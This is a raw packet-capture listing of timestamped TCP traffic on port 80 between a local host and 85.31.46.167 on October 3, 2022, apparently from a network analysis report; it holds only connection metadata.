Oct 3, 2022 17:42:21.212480068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212483883 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212498903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212507010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212517977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212532043 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212537050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212555885 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212558031 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212574959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212579966 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212594032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212606907 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212611914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212630987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212631941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212650061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212654114 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212668896 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212677002 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212687016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212699890 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212704897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212723017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212729931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212742090 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212754965 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212759972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212775946 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212778091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212796926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212798119 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212816000 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212821007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212836981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212843895 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212856054 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212866068 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212883949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212888002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212894917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212901115 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212903023 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212914944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212922096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212934017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212939024 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212953091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212960958 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212970972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212979078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.212990046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.212996006 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213009119 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213013887 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213027954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213036060 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213046074 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213054895 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213066101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213072062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213089943 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213090897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213100910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213109016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213119984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213120937 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213138103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213138103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213156939 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213159084 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213175058 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213177919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213192940 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213196993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213212967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213217020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213236094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213243961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213255882 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213257074 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.213268995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.213289022 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.238610029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.238646984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.238703966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.238729954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.238733053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.238775015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.238782883 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.238805056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.238806009 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.238837004 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.238858938 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240159988 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240199089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240221977 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240255117 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240355968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240385056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240411997 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240418911 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240441084 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240468979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240475893 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240503073 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240557909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240597010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240602016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240634918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240689993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240747929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240777016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240780115 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240803003 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240811110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240823030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240835905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240864992 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240879059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240891933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240907907 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240920067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240931034 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240948915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240963936 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.240978003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.240986109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241005898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241015911 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241033077 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241044044 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241061926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241075039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241091013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241101027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241122961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241172075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241173029 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241199017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241226912 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241230011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241255999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241262913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241287947 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241302013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241318941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241332054 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241358995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241381884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241386890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241393089 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241405964 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241417885 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241431952 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241446018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241461039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241473913 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241491079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241501093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241513968 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241527081 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241543055 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241553068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241565943 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241588116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241616011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241624117 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241643906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241647005 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241672039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241672993 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241693020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241694927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241723061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241725922 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241751909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241755962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241784096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241795063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241805077 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241807938 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241822004 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241842985 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241849899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241874933 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241879940 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241897106 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241909027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241919994 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241935968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241946936 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241965055 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.241975069 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.241991997 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242007971 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242021084 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242048025 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242063999 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242074966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242089987 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242105961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242120981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242135048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242162943 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242162943 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242191076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242207050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242219925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242230892 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242249012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242252111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242279053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242279053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242305040 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242307901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242336035 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242356062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242377043 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242383957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242403984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242413044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242434978 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242441893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242460966 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242482901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242490053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242516994 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242518902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242539883 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242552042 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242564917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242568970 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242590904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242616892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242629051 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242640972 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242645979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242671013 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242674112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242702007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242708921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242723942 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242738008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242748022 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242767096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242779970 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242791891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242808104 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242819071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242842913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242846012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242867947 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242887020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242892981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242917061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242942095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242944002 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242964029 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.242968082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.242996931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243010044 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243022919 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243026972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243041039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243046045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243069887 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243074894 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243100882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243100882 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243127108 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243129969 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243148088 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243156910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243172884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243185997 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243200064 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243213892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243236065 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243243933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243253946 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243273020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243280888 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243302107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243314028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243329048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243341923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243365049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243369102 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243376017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243405104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243412971 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243432045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243432999 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243449926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243460894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243486881 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243488073 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243514061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.243526936 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.243556976 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.266215086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.266248941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.266274929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.266294003 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.266297102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.266294003 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.266329050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.266355038 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.266355038 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.266379118 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.267261028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.267294884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.267308950 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.267323971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.267338991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.267353058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.267360926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.267380953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.267391920 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.267407894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.267416000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.267436981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.267441988 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.267465115 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.267471075 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.267493963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.267520905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.267522097 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.267543077 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.267560959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:21.524390936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.525166988 CEST	49711	80	192.168.2.6	85.31.46.167
